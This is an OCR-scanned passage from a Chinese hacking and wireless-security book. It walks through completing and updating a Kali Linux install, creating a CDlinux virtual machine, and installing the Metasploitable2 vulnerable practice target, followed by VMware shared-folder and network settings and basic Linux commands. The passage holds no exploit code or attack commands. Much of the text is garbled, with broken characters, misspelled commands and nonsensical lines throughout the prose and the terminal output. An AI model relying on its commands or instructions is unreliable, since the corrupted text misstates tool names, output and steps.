天 人 的 计 和 有 上 到 已 在 的 其 作 天 弹 ， 朱 下 主导 动人 和 有 从 作 玉 无 法 局 埃 ， 但 时 您 以 硬 


ESE 上 而 


step 图 按 Enter 键 ， 进 入 选择 引导 路 径 界 面 ， 
选择 “/dev/sda” 选 项 ， 如 下 图 所 示 。 


ELITETCCOTTITTIOITTTOREIOTETSRTTCEETO 
om 本 和 GRU 和 天 人 方 ， 二 大昌 动 者 上 反正 可 以 于 到 一生 上 


ET 


step 图 按 Enter 键 ， 进 入 完成 安装 ， 提 示 用 户 
重启 进入 系统 ， 如 下 图 所 示 。 


step 图 按 Enter 键 ， 安 装 完 成 后 重启 ， 进 入 用 
户 名 界面 ， 在 其 中 输入 root 管 理 员 账号 ， 如 
下 图 所 示 。 


[Eee 图 单 击 “ 下 一 步 ”按钮 ， 进 入 登录 密码 
2 在 其 中 输入 设置 好 的 管理 员 密 码 ， 
如 下 图 所 示 。 


[sep 图 单 南 “ 登 录 ” 按 钮 ， 至 此 便 完 成 了 
整个 Kail Linux 系 统 的 安装 工作 ， 如 下 图 
所 示 。 


3.2.3 ”更 新 Kali Linux 系 统 


初始 安装 的 Kali Linux 系 统 如 果 不 及 
时 更 新 是 无 法 使 用 的 ， 下 面 介绍 更 新 Kali 
Linux 系 统 的 方法 与 步 又 。 
双击 桌面 上 Kali Linux 系 统 的 终端 黑 
色 图 标 ， 如 下 图 所 示 。 


打开 Kali Linux 系 统 的 终端 设置 界 
面 ， 在 其 中 输入 命令 apt update， 然 后 按 
Enter 键 ， 即 可 获取 需要 更 新 软件 的 列表 ， 
如 下 图 所 示 。 


root@kal: ~ ooe 
文件 (F】 凯 辑 人 E) 查看 (/) 搜索 (5) 终端 [T) 帮助 |H) | 
Iroot@kali: ~# apt update 

高 中 :+1 http://nirrors.neusoft.edu,. cn/kali Kati-rotting IrRelease 
正在 庄 职 软件 包 列表 ，.， 完 成 

正在 分 析 软 件 但 的 依 购 关 素 例 
正在 读 职 状态 信息 ,, ， 完 成 

| 有 62 个 软件 名 可 以 并 级 。 靖 执 行 “apt Uist - 
Iroot@kali:-# 目 


获取 完 更 新 列表 后 如 果 有 需要 更 新 
es 可 以 运行 apt upgrad 命 令 ， 如 下 图 
所 示 。 


Tr COUT | 


-upgradable” 来 查看 它们 - 


ibmglnx-med- 
Tbngtnx -mod 


-xstT-TILYeF tipngInX-90G-WRIL 
ean tibapenaldata Libopenal1 
ze9 tipparTed2 tpper15-25 Nan-do nodewranager 
DO 
ap pytheng-th Taystog sqtmag 
个 要 伯 辕 要 名 下 和 不下 让 是“ 营 1 个 名作 自 幸 答 升 必 


你 总 所 经 技 扫 行 号 7 TY/nl “nt 


行 命令 后 会 有 一 个 提示 ， 此 时 按键 


step 园 运 
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盘 Y 键 ， 即 可 开始 更 新 ， 更 新 中 状态 如 下 图 
所 示 。 


丘 王 可 要 可 TREED 
赴 在 将 libgjs9g (1-52-4-1) 节 包 到 (1.52.3-2) 上 ” 
正 准备 解 包 .../11-9js 1.52.4-1 amd64-deb 
匡 在 千 9js 11.52-4-1) 解 包 到 (1.52.3-2) 上 

正 淮 备 解 包 .…./12-gnowe-user-docs 3.39.1-1 all.deb 
正在 将 gnone user-des (3.39.1-1) 解 包 到 (3.39.9-1) 上 


E 


侈 注意 : 由 于 网 络 原因 可 能 需要 多 执行 几 
次 更 新 命令 ， 直 至 更 新 完成 。 另 外 ， 如 果 
个 别 软件 已 经 安装 并 存在 升级 版 本 问题 ， 
如 下 图 所 示 。 


民 序 区 基因 太志 诗集 拉 不 要 : 
内 明了 日 个 次 件 回 ,新 安装 了 9 个 软件 外， 要 印 栖 8 个 软件 得， 有 1 个 软件 包 来 被 升 纵 。 


这 时 ， 可 以 先 印 载 旧 版 本 ， 运 行 “apt- 
get remove < 软件 名 >” 命 令 ， 如 下 图 所 示 ， 
此 时 按键 盘 上 的 了 键 即 可 印 载 。 


roovanalls apt-get renove wpscan 
正在 恋 昭 软件 自 列表 ,,， 完 奈 
正在 分 析 软 件 包 的 依 困 关系 机 
正在 谈 吕 状态 信息 .. ， 完 成 
下 列 软 件 刁 是 自动 安装 的 并 且 理 压 不 需要 了 
ruby-ethon ruby-+fi ruby-riby-progressbar ruby-terminal-table ruby-typhoeus 
ruby-unicode-display-width ruby-yajt 
apt autoremove' 来 色 工 它 ( 它 们 )。 


您 站 里 她 技 执行 双 ?_ IY/n] y 

趣 载 完 旧版 本 后 ， 可 以 运行 “apt-get 
install < 软件 名 >” 命 令 ， 如 下 图 所 示 ， 此 时 
按键 盘 上 的 Y 键 即 可 开始 安装 新 版 本 。 


FeatgarE-YaPCSEE InSTATT WhSCAn 
。 完成 


| 下列 隘 件 自 录 日 动 安 交 的 并 且 里 在 不 需要 了 


canner_ ruby-opt-parse-validator ruby-progressbar 
下 下 
ruby-ruby-progressbar 
下列 【新 】 次 忻 包 将 补 安 区 
ruby-cms-scanner ruby-opt-parse-vatidator ruby-progressbar wpscan 
包 ,要 部 我 1 个 软件 包 ,， 有 9 个 软件 包 未 被 升级 、 


| 于 缩 后 会 消 医 594 kB 的 国外 字 间 - 
您 而 显 经 护 执行 码 ?_ TY/n] y 


最 后 ， 再 次 运行 apt upgrade 命 令 ， 如 
果 显 示 无 软件 需要 更 新 ， 此 时 系统 更 新 完 
成 ， 如 下 图 所 示 。 


TaatBRaUI-7 sppgrage 
正在 读 取 狂 件 包 列 表 .- ， 羌 成 


下 列 软件 包 是 自动 安装 的 并 且 现 在 不 需要 了 ; 
ruby-terminal -table ruby-unicode-display-width 

作用 'apt autorenove' 来 加载 它 (它们 )。 

升级 了 日 个 软件 包 ， 新 安装 了 日 个 软件 包 ， 要 种 闵 9 个 软件 包 ， 有 日 个 软件 包 未 被 升级 。 


3.3 ”安装 CDlinux 系 统 


CDlinux 是 一 种 小 型 的 迷你 GNU/Linux 
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员 和 3.3.1 


= 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


发 行 版 软件 ， 其 名 称 取 自 英文 的 Compact- 
DistroLinux。CDlinux 的 体形 小 巧 ， 功 能 却 
很 强大 。 
CDlinux 简 介 

使 用 者 可 以 把 CDlinux 看 作 是 一 个 “ 移 
动 操作 系统 ”， 把 它 装 到 随身 U 盘 中 ， 无 
论 走 到 哪里 ， 只 要 是 能 支持 U 盘 启动 的 计 
算 机 ， 就 可 以 插 上 U 盘 来 启动 CDlinux 操 
作 系 统 ， 从 而 把 这 台 计 算 机 变 成 自己 的 移 
动工 作 站 。 

CDlinux 里 集成 了 最 新 的 Linux 内 核 、 
Xorg 图 形 界 面 、Xfce 窗 口 管理 器 以 及 很 多 
其 他 流行 软件 ， 如 Firefox 浏 览 器 、Pidgin 即 
时 通信 程序 、GIMP 图 像 处 理 程 序 等 ， 这 就 
使 得 移动 工作 更 加 方便 。 

另外 ， 还 可 以 把 CDlinux 当 作 一 件 
随身 的 系统 修复 /维护 工具 。 这 是 因为 在 
CDlinux 标 准 版 里 集成 了 大 量 的 系统 修复 / 
维护 工具 ， 如 parted、partimage、part- 
clone、testdisk、foremost 等 ， 使 用 这 些 工 
具 完 全 可 以 满足 日 常 系统 维护 /修复 工作 的 

目前 ，CDlinux 对 简体 中 文 提供 全 面 支 
持 ， 这 极 大 地 方便 了 使 用 中 文 的 用 户 。 


溅 内 3.3.2 配置 CDlinux 
创建 CDlinux 虚 拟 机 需要 以 下 几 个 
步骤 ， 


[step 轩 | 单 直 VMware 虚拟 机 在 主页 中 有 “ 创 
建新 的 虚拟 机 ”按钮 ， 如 下 图 所 示 。 


| WORKSTATION 14 PRO™ | 
+ 的 的 
创建 新 的 虚拟 机 打开 虚拟 机 连接 远程 服务 器 


[ep 国 进入 新 建 虚拟 机 向 导 对 话 框 选择 “ 典 
型 (推荐 ) ” 单 选 按钮 ， 如 右上 图 所 示 ， 
单 击 “ 下 一 步 ” 按 钮 。 
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欢迎 使 用 新 建 虚 拟 机 问 导 
1 4 新 记 全 月 计 和 二 浊 7 
VORKSTATION 国 寺 型 | 推荐 JIT) 


各 过 几 个 出 划 的 东 深 外 汗 Workstacon 14 工 
诺 R 机 。 


OKO) 
有 5051 控 机 器 关 型、 凡夫 型 
全 


' 


二 上 一 上 


一 


[step 图 在 “安装 客户 机 操作 系统 ”对 话 框 
中 ， 选 择 “ 安 装 程序 光盘 映 象 (iso) ” 单 
选 按钮 ， 并 为 其 添加 CDlinux 光 盘 文 件 ， 如 
下 图 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 

Mn, 需要 操作 夭 统 。 您 构 如 何 安 装 客户 机 操作 系统 ? 


Ee 
ED 


元 用 引 直 各 


回去 装 程序 光盘 独 像 廊 件 (soXM): 
rlsdunerdeDown oa\ CDI 0 07.1_Chsoc_ S56 ~ | 


盐 无 法 榨 秽 此 大 盘 出 像 中 隐 弛 作 夭 卉 。 
入 雪 要 拉 定 要 的 折 作 和 


口 稍 后 安 其 可 作 不 统 (5) 
2 的 虚拟 所 村 也 合 一 个 空白 研 盘 。 


Ld < 上 -#(6) 下 -上 (N)> be 


[step 园 在 “选择 客户 机 操作 系统 ”对 话 
框 中 选择 Linux 选 项 ， 版 本 中 选择 “其 他 
Linux2.6x 内 核 ”， 如 下 图 所 示 ， 单 击 “ 下 
一 步 ” 按 钮 。 


选 释 容 户 机 措 作 系统 
此 点 投机 本 本 安装 是 拉 作 系统 > 


O sokrs(s) 

O vmware Esx0) 
Ofe(o) 
新 本 (V) 

其他 tnx26x 启 核 


二 < 上 - 步 | [FE > 取消 


[step 较 在 “命名 虚拟 机 ”对 话 框 中 单 击 “ 浏 
览 ” 按 钮 ， 为 虚拟 机 选择 一 个 保存 位 置 ， 
如 下 图 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 


命名 虚拟 机 
您 希望 该 虚拟 机 使 用 什么 名 称 ? 


虚拟 机 名 称 (V): 
ER 


位 置 (U: 
ER 


在 "编辑 >" 首选 硕 "中 可 更 欢 默认 位 置 。 


< 上 一 步 (B) 


[see 图 “指定 磁盘 容量 ”界面 保持 默认 即 
可 ， 如 下 图 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 


下 一 步 (N) > 取消 


指定 磁盘 窒 旦 
磁盘 大 小 为 多 少 ? 


虚拟 机 的 硬盘 作为 一 个 或 条 个 文件 存 仁 在 主机 的 物理 磁盘 中 。 这 些 文件 最 初 很 小 ， 随 着 你 
向 虚拟 机 中 添加 应 用 程序 、 文 件 和 数据 而 逐 产 灾 大 。 


最 大 磁盘 大 小 (6B)(S): 


针对 其 他 Unux 2.6.x 内 校 的 建议 大 小 : 8 GB 


口 将 虚拟 磁盘 存储 为 单个 文件 (D) 
图 将 虚拟 磋 盘 拆 分 成 条 个 文件 (M) 
Pa 可 以 更 轻松 地 在 计算 机 之 间 移动 虚拟 机 ， 但 可 能 会 降低 大 容量 泣 盘 的 性 
Eo 


a Es i 
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[Step 图 在 配置 好 的 虚拟 机 启动 界面 ， 单 击 
“开启 此 虚拟 机 ”按钮 ， 启 动 虚 拟 机 ， 如 
下 图 所 示 。 


其 他 Linux 2.6x 内 核 


step 图 在 虚拟 机 启动 过 程 中 可 以 选择 语言 环 
境 ， 如 下 图 所 示 。 


[step 园 至 此 便 配 置 好 了 CDlinux 系 统 ， 如 
下 图 所 示 ， 单 击 “ 完 成 ”按钮 完成 虚拟 机 
创建 。 
| | 
已 准 和 好 创建 虚报 机 

单 击 ' 完 成 他 键 虚拟 机 。 然 后 可 以 安装 其 他 Unux 2.6x 内 核 。 


将 使 用 下 列 设置 创建 虚拟 机 : 
名 称 : 其 他 Lnux 2.6.x 内 核 
位 置 : E:\CDinux 
版 本 : Workstation 14.x 
操作 系统 其 他 Unux 2.6x 内 术 
硬盘 : 8 GB, 拆 分 
内 存 : 256 MB 
网 络 适 村 器: NAT 
其 他 设备 : CD/DVD, USB 控制 器 , 打印 机 , 声卡 


自 定义 硬件 (C)… 


< 上 一 步 (B) 完成 取消 


‘6 


三 受 帮 所 名 中 时 


3.4 安装 与 使 用 靶 机 
拿 到 局 域 网 权限 后 需要 后 续 的 渗透 
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SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


测试 ， 这 里 选取 一 款 比 较 好 的 靶 机 一 一 
Metasploitable2， 该 对 机 中 包含 了 大 量 的 系 
统 漏洞 ， 用 户 使 用 该 靶 机 不 仅 可 以 做 日 常 
的 无 线 网 络 安全 练习 ， 还 可 以 提高 自身 的 


隔 夯 加 ge 画 和 


安全 技术 。 侈 注意 : 这 里 存放 的 路 径 是 创建 虚拟 机 后 
的 路 径 ， 因 此 选择 一 块 空间 充足 并 且 便 于 
更 3.4.1 认识 靶 机 记忆 的 位 置 。 


Metasploitable 漏 洞 演练 系统 ， 是 基于 ” [step 图 打开 wmware 虚 拟 机 ， 进 入 虚拟 机 的 

ubuntu 操作 系统 ， 本 身 设 计 作为 安全 工具 测 ， 主 界面 ， 如 下 图 所 示 。 

试 和 演示 常见 漏洞 攻击 ， 它 的 作用 是 用 来 

作为 MSF 攻 击 用 的 靶 机 ， 它 是 一 个 具有 无 

数 未 打 补 丁 漏洞 与 开放 了 无 数 高 危 端口 的 

渗透 演练 系统 ， 可 以 使 我 们 进行 练习 。 十 器 ® 
在 网 络 中 攻击 现实 中 的 主机 是 一 种 违 

法 行为 ， 一 旦 被 对 方 发 现 可 能 会 遭受 被 起 A 

诉 的 风险 。 因 此 使 用 Metasploitable 系 统 来 练 单 击 “ 打 开 虚 拟 机 ”按钮 ， 打 开 “ 打 

习 ， 不 但 可 以 更 加 直观 地 感受 漏洞 利用 的 过 ， 开 ”对 话 框 ， 在 其 中 找到 解压 目录 ， 如 下 

程 ， 还 可 以 学 会 如 何 修补 防御 这 些 漏洞 。 图 所 示 。 


WORKSTATION 14 PI 


创建 新 的 虚拟 机 打开 虚拟 机 连接 远程 服务 器 


画 厂 
由 3.4.2 ”安装 靶 机 0 
起 积 > 。 新 半 文件 夫 -me 
目前 Metasploitable 已 经 推出 3 个 系 Ci Ks 
列 ， 这 里 选用 Metasploitable2。 下 载 并 安装 WE 
Metasploitable2 的 操作 步骤 如 下 : 1 让 
在 浏览 器 中 输入 http://sourceforge.net/ SA | 一 


projects/metasploitable/files/Metasploitable2/ 
网 址 ， 在 打开 的 页 面 中 找到 下 载 页 面 ， 如 ” [ses 国 选中 目录 中 的 虚拟 机 文件 ， 单 击 “ 打 
下 图 所 示 。 开 ” 按 钮 ， 这 样 便 创建 好 了 虚拟 机 ， 如 下 


图 所 示 。 
Get Updates 
[ Metasploitable2-Linux 


Esteep 贺 单 击 下 载 页 面 中 的 下 载 按钮 ， 并 选择 
软件 的 保存 路 径 ， 下 载 完成 后 会 有 一 个 名 
为 “metasploitable-linux-2.0.0.zip” 的 压缩 
包 文 件 ， 下 图 为 打开 压缩 包 的 状态 。 


[em epee 00 


LE B53KB 
step 图 将 该 压缩 包 文 件 解压 到 磁盘 当中 ， 双 | 
击 打开 该 目录 ， 查 看 解压 后 的 文件 是 否 缺 。 [step 贺 单 去 “开启 此 虚拟 机 ”按钮 ， 会 弹出 
少 ， 如 右上 图 所 示 。 一 个 对 话 框 ， 如 下 图 所 示 。 
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Metasploitable2-Linux - VMware Workstation 


@ 此 虚拟 机 可 能 已 被 移动 或 艳 制 * 
了 了 可 于 特 守 的 管理 和 9 络 功能 ，VMware Workstaton 雪 要 知 
i 


如 果 您 不 知道 ,请 回答 “我 已 夏 制 该 虚拟 机 (P) 
我 已 移动 该 虚拟 机 (M) ”| 我 已 夏 制 该 虚拟 机 (P) 取消 


Step 图 单 击 “ 我 已 移动 该 虚拟 机 ”按钮 ， 启 
动 Metasploitable2， 
装 ， 如 下 图 所 示 。 


这 样 就 完成 了 靶 机 的 安 


侈 注意 : 虚拟 机 镜像 创建 的 虚拟 机 默认 账 
号 和 密码 均 为 mfsadmin， 可 以 通过 passwd 
命令 修改 密码 。 


登录 进 虚 拟 机 以 后 建议 更 改 该 初始 密 
码 ， 修 改 密码 使 用 passwd msfadmin 命 令 ， 
输入 完 命 令 后 会 要 求 输入 原始 密码 ， 原 始 
密码 输入 正确 后 会 要 求 输入 新 密码 ， 输 入 
两 次 一 样 的 密码 后 表示 修改 密码 完成 ， 如 
下 图 所 示 。 


nsfadminemetasploitable:~9 pas 
ssuord for msfadnin 


ud msfadmir 


assword 


Enter new UNIX 


(从 注意 : Linux 系 统 中 输入 密码 是 不 显示 
的 ， 直 接 输 入 即 可 ， 不 要 以 为 没有 输入 ， 
另外 ， 如 果 输 入 密码 过 短 系 统 也 会 提示 要 
求 输入 一 个 较 长 的 密码 。 


3.4.3” 靶 机 的 使 用 


驾 机 安装 完成 后 ， 就 可 以 使 用 该 靶 机 
了 ， 使 用 方法 非常 简单 。 启 动 虚拟 机 后 ， 
靶 机 系统 也 会 启动 ， 这 样 用 户 就 可 以 使 
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各 种 扫描 工具 来 扫描 靶 机 中 的 系统 漏洞 ， 
进入 演示 使 用 漏洞 攻击 系统 的 过 程 。 


3.5 ”实战 演练 


实战 演练 1 一 一 设置 Kail 与 主机 共享 文件 夹 
通过 安装 虚拟 机 工具 设置 Kali 与 主机 实 
现 共享 文件 ， 具 体操 作 步 又 如 下 : 


step 园 在 VMware 工 具 栏 中 ， 选 择 “ 虚 拟 
机 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 


“设置 ”菜单 命令 ， 如 下 图 所 示 。 
声 拟 机 (M) 远 项 卡 (T 帮助 H) | 有 ~ 
可 移动 设备 (D) 
暂停 (U) Ctrl+Shift+P 


发 送 Ctrl+Ak+ Del(E) 


抓 取 输入 内 容 ( Ctrl+G 
快照 (N) > 
丘 于 屏幕 (CO) Ctrl+Alt+PprtScn 
入 管理 (M) 
取消 VMware Tools 安装 (T) 
号 宣 9- 区 ct+D 


打开 “虚拟 机 设置 ”对 话 框 ， 选 择 
“选项 ”选项 卡 ， 并 在 “ 设 
择 “ 共 享 文件 夹 ” 选 项 ， 


置 ”列表 中 选 
如 下 图 所 示 。 


3 Wn 3 


[Be 图 单 击 “添加 ”按钮 ， 弹 出 “添加 共享 
文件 夹 向 导 ” 对 话 框 ， 如 下 图 所 示 。 
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搭建 无 线 测 试 系统 Kali Linux 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


欢迎 使 用 湛 加 共享 文件 夹 向 导 


此 问 导 椅 引 导 盒 完成 问 虚拟 机 添加 新 共享 广 
件 夹 的 步 台 。 
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< 上 ~w(8) 了 有 


[step 国 ] 单 击 “ 下 一 步 ” 按 钮 在 打开 的 “ 命 
令 共 享 文件 夹 ” 对 话 框 中 输入 文件 夹 名 
称 ， 并 选择 一 个 共享 文件 夹 路 径 ， 如 下 图 
所 示 。 


命名 共享 文件 夹 
如 何 命名 此 共享 文件 夹 ? 
主机 路 径 (H) 
[Di\ShareDr 
名 称 (A) 


[Snareor 


< 上 -上 (8) 下 - 步 (N)> 取消 


[sep 图 单 击 “ 下 一 步 ” 按 钮 ， 进 入 “指定 
共享 文件 夹 属性 ”对 话 框 ， 指 定 共 享 文件 
夹 属性 ， 也 可 以 保持 默认 设置 ， 最 后 单 击 
“完成 ”按钮 ， 完 成 共享 文件 夹 的 设置 操 
作 ， 如 下 图 所 示 。 


指定 共享 文件 去 属性 
指定 此 共享 文件 夹 的 范围 。 


其 他 属性 
回 启用 此 共享 (E) 
DA) 


< 上 —(8) 取消 
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[see 图 在 VMware 菜单 中 选择 “虚拟 机 ” 菜 
单项 ， 在 弹出 的 菜单 列表 中 选择 “重新 安 
装 VMware Tools” 选 项 ， 如 下 图 所 示 。 


Eu mm | 员 v | 号 | 乓 
(D 电源 (P) 》 
© Baas(D) 》 

著 停 (U) Ctrl+Shift+P 
号 和 Cul+Ak+Del(E) 

抓 取 给 入 内 容 人 Cn+G 
吊 癸 照 (N) 》 

捕 奖 屏幕 (O 〇 Ctrl+Ak+prtScn 
管理 M) > 
弛 设置 (9).. Ctrl+D 


此 时 会 在 Kali 虚 拟 机 中 弹出 一 个 安装 
光盘 ， 打 开光 盘 后 ， 里 面 会 有 5 个 文件 ， 如 
下 图 所 示 。 

IC 二 


[al=- -sleoe 


Pd 


run_upgradersh VMwareTools- 
102 5-8068393 tar. 
gr 


© Recent 
Starred 
A Home 
Deskop 
D pecumens 


© pownioade 


也 Music 
白 peures 
日 veeos 


vmware-tools- 
upgader-32 


ymware-tools- 
Upgrader-64 


BTrash 


step 贺 复制 压缩 包 文件 “VMwareTools- 
10.2.5-8068393.tar.gz” 到 Downloads 目 录 
下 ， 如 下 图 所 示 。 


< > QHome | Do lale:-|l= eee 

站 Recent 3 

二 Starred 站 

人 Home TGZ 
VMwareTools- 

画 Desxtop 10.25-8068393.tar 

双 

D Documents 

6 Music 

白 Pictures 

日 vdeos 

画 Tmsh 


© VMwareToo- 2 


Ee 图 选中 压缩 包 文件 ， 右 去 ， 在 弹出 的 快 
捷 菜单 中 选择 “提取 到 此 处 ”菜单 命令 ， 
如 下 图 所 示 。 


国 用 归档 管理 器 打开 。” 回 车 
使 用 其 他 程序 打开 (A) | 
筋 切 四 CtrliX 
复制 (C) Curtc 
移动 到 _ 

复制 到 _ 

移 到 回收 站 副 除 
重 命名 (M)- F2 
提取 到 此 处 (E) 

提取 到 的- 

压缩 (0). 

收藏 

属性 (R) ctrts | 


开始 解压 文件 夹 ， 解 压 完成 后 ， 在 内 
部 发 现 一 个 vmware-install.pl 文 件 ， 如 下 图 
所 示 。 

[eC » | mn 


疾风 近 使 用 
Wi ee a ee 


月 Musle FILES 


Installer 


all: -|=|eee 


分 主 目录 
而 捍 困 


D Documents 


© Downloads 
INSTALL 
DO Pictures 
日 vdeos 
国 必 站 
© vMwareToo， a 
+ 其他 位 置 #0 


vmware-install pl 


step 加 光标 移动 到 文件 夹 空白 区 域 ， 右 击 ， 
在 刍 必 交 村 革 单 让 选择 “在 终端 打开 ” 
菜单 命令 ， 如 下 图 所 示 。 


新 建文 件 夹 (F) ”Shi 
粘贴 (P) 

全 选 (A) 

属性 (R) 

在 终端 打开 (E) 


i ] 
ft+Ctrt+N 


Ctrl+A 


step 图 这 时 在 终端 中 执行 ./ vmware-install.pl 
命令 ， 下 图 dd A 


oorAUL -70omm toads7 Va 
ne nstaller Nas detected an ex1sTing instal lathon of open-wn- tools packages 
pn this systen and will not attenpt to renove and replace these user-space 
pplications" Tt 1s "recommended th use the open' Yn toos packages Brovided by 
he ope rating System 1f you do not want To bse the ex1sting nstal lation of 


A 


spen -wm-tools packages and use VMvare Tools, you Rust Uninstall the 
pen-wm- tools packages and re-run this instatler 

me packages that need to be renoved are 

pen-wm- tools 

packages must be removed with the --purge option 

[me lnstatLer will next check 1f there are any nissing kernel drivers. Type yes 
f you want to do thls, otherulse type no [yes] y 


第 3 章 ”搭建 无 线 测 试 系统 Kali Linux 


[step 图 如 果 安 装 过 程 中 提示 [yes] ， 按 键 
盘 上 的 Y 键 或 Enter 键 直到 安装 完成 ， 安 装 完 
成 后 ， 在 mnt 目 录 中 会 多 出 一 个 共享 文件 夹 
hgfs， 如 下 图 所 示 。 


root@kali:/# cd mnt 
root@kali:/mnt# ls 
hgfs 

root@kali: 
root@kali: 


/mnt# cd hgfs 
/mnt/hgfs# LS 


root@kali: 
root@kali: 


/mnt/hgfs# cd ShareDir/ 
/mnt/hgfs/ShareDir# | | 


实战 演练 2 一 一 设置 Kali 虚 拟 机 的 上 网 
方式 


Kali 虚 拟 机 可 以 设置 3 种 网 络 模式 ， 设 
置 上 网 方式 的 操作 步骤 如 下 : 
[step 轩 在 VMware 菜单 项 中 ， 选 择 “ 虚 拟 
机 ”一 “网 络 适配器 ”一 “设置 ”菜单 命 
令 ， 如 下 图 所 示 。 


i 0 we | -131: 


可 台 上 I 同 


[CE 四 一- eh 
CO (Wo (ot 3 

Er ER CI 
3 so EE 2 

MAA colte Peatimeging Us opica Moue = » 
加 ea reid > 

mr rp 


打开 “虚拟 机 设置 ”对 话 框 ， 在 其 中 
选择 “网 络 适 配器 ”选项 ， 在 右 侧 可 以 看 
到 “网 络 连 接 ” 设 置 界面 ， 这 里 提供 的 连 
接 方式 有 3 种 ， 如 下 图 所 示 。 


Wt 6 
En 摘要 入 
[ea 68 ei) 
Dg ET 
Sm (scsD oe 
So tn: 下 相信 0proonm Fes 。 总 拉 
O 


亡 本 号 | 


3 种 网 络 连接 方式 介绍 如 下 : 
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EE 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


(1) 桥接 模式 。 如 果 选 择 该 连接 模式 ， 
虚拟 机 可 以 获取 独立 的 他 地 址 ， 通 过 独立 
IP 地 址 进行 上 网 。 

(2) NAT 模 式 。 如 果 选 择 该 连接 模式 ， 
虚拟 机 将 与 主机 公用 一 个 他 地 址 ， 通 过 主 
机 耳 地 址 实现 NAT 转换 上 网 。 

(3) 仅 主 机 模式 。 如 果 选 择 该 连接 模 
式 ， 虚 拟 机 仅 同 主机 进行 通信 ， 不 能 接 入 
Intenet 外 网 。 
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3.6 ”小 试 身手 


练习 1: 下 载 并 安装 虚拟 机 软件 。 

练习 2: 下 载 并 安装 Kali 虚 拟 机 ， 同 时 
更 新 Kali 虚 拟 机 到 最 新 。 

练习 3: 配置 CDliunx 虚 拟 机 ， 并 运行 
CDliunx 进 入 桌面 。 

练习 4: 安装 并 运行 Metasploitable 靶 机 


第 4 音 


熟悉 无 线 网 络 安全 测试 平 


台 一 一 Kali Linux 系 统 的 基本 操作 


大 多 数 无 线 黑客 都 会 选择 Kali Linux 作 为 测试 平台 ， 这 是 因为 大 部 分 无 线 黑 客 工 具 都 
是 基于 Kali Linux 系 统 环 境 下 的 。 本 章 介绍 Kali Linux 操 作 系 统 的 基本 操作 ， 主 要 包括 Kali 
Linux 系 统 下 的 命令 格式 、 管 理 文件 和 目录 命令 、 文 件 内 容 查 看 命令 、 权 限 分 配 操作 命 


令 、 文 本 搜索 操作 命令 等 。 


4.1 Kali Linux 系 统 下 的 命令 
格式 


Kali Linux 命 令 格式 同 DOS 命 令 格式 类 
似 ， 不 过 Kali Linux 命 令 是 区 分 大 小 写 的 ， 这 
一 点 需要 注意 。Kali Linux 命 令 格式 如 下 : 

命令 [- 选 项 ] [参数 ] 

例如 : 

1s -la /etc 


该 命令 行 中 使 用 了 ls 命令 ， 并 且 选 用 
了 -l 选 项 与 -a 选项， 多 个 选项 写 在 一 起 ， 后 
面 /etc 作 为 一 个 参数 传 入 进来 ， 得 到 一 个 完 
整 的 命令 行 。 

另外 ， 在 使 
注意 以 下 事项 : 

(1) 有 一 些 个 别 命令 的 使 用 不 遵循 此 
格式 。 

(2) 当 有 多 个 选项 时 ， 可 以 写 在 一 起 。 


Kali Linux 命 令 时 ， 需 要 


(3) 简化 选项 与 完整 选项 。 例 如 : -a&W 诺 


等 于 -all。 

(4) 存在 不 加 选项 单独 执行 的 命令 。 
例如 : cd /etc， 使 用 了 cd 命令， 并 没有 加 
入 选项 ， 此 时 /etc 依然 作为 参数 使 用 ， 得 到 
一 个 完整 命令 。 还 有 top， 使 用 top 命令 ， 
并 没有 选取 任何 选项 以 及 参数 ， 但 即使 这 
样 它 依然 是 一 条 完整 的 命令 。 

由 此 可 以 看 出 Kali Linux 的 命令 可 以 
选择 加 入 一 些 选 项 及 参数 ， 也 可 以 独立 运 
行 ， 取决 于 实际 选择 的 命令 。 


管理 文件 和 目录 命令 


管理 文件 和 目录 的 命令 是 Kali Linux 系 
统 中 常用 的 一 些 命令 ， 掌 握 这 些 命令 的 使 
用 方法 ， 可 以 帮助 用 户 提高 使 用 Kali Linux 
操作 系统 的 能 力 。Kali Linux 管 理 文件 和 目 
录 的 命令 见 下 表 。 


4.2 


表 Kali Linux 管 理 文件 和 目录 的 命令 


显示 目前 的 目录 列 出 目录 
cd | 切换 目录 中 | 复制 文件 或 目录 
mkdir | 创建 一 个 新 的 目录 | 移动 文件 或 目录 


移 除 文件 或 目录 


4.2.1 ls 


ls 命令 用 来 查看 目录 的 内 容 。 语 法 格式 如 下 : 


删除 一 个 空 的 目录 


= 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


ls 选项 [-ald] [文件 或 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 


表 ”Is 命令 参数 介绍 


选 项 含义 
-a 显示 目录 中 的 全 部 文件 ， 包 括 隐藏 文件 
-1 显示 目录 中 的 细节 ， 包 括 权限 、 所 有 者 、 组 群 、 大 小 、 创 建 日 期 、 文 件 是 否 是 链接 等 
工 从 后 向 前 依次 列 出 目录 中 内 容 
+t 将 文件 依 建立 时 间 的 先后 次 序列 出 
f 显示 列 出 文件 的 文件 类 型 
-Ss 按照 文件 的 大 小 排序 文件 
-R 该 选项 以 递归 方式 列 出 当前 目录 下 所 有 子 目 录 内 的 内 容 
h 以 可 读 的 方式 显示 文件 的 大 小 ， 如 用 K、M、G 作 单位 


例如 : 使 用 ls -al 命令 ， 来 显示 目录 中 
全 部 文件 的 详细 信息 ， 下 图 为 执行 效果 ， 
这 里 截取 了 部 分 文件 信息 ， 其 中 ， 左 侧 显 
示 的 是 目录 或 文件 的 权限 信息 ， 第 一 个 root 
是 文件 的 所 有 者 信息 ， 第 二 个 root 是 文件 的 
所 有 者 所 在 的 所 属 组 信息 。 


FootGKaUIE: -六 ts -a 

总 用 量 

8nwr-xr-x 29 root root 4996 10 月 29 22:13 

brwxr-xr-x 28 root root 36864 10 27 21:38 

Frw------- 1 root root 39728 16 月 36 B3:B5 .bash history 
-bashrc 


3 root root 4996 6 月 21 97;63 .gl 


和 mkdir 命 令 用 来 建立 目录 ， 目 录 名 称 需 
要 使 用 参数 给 定 。 语 法 格式 如 下 : 
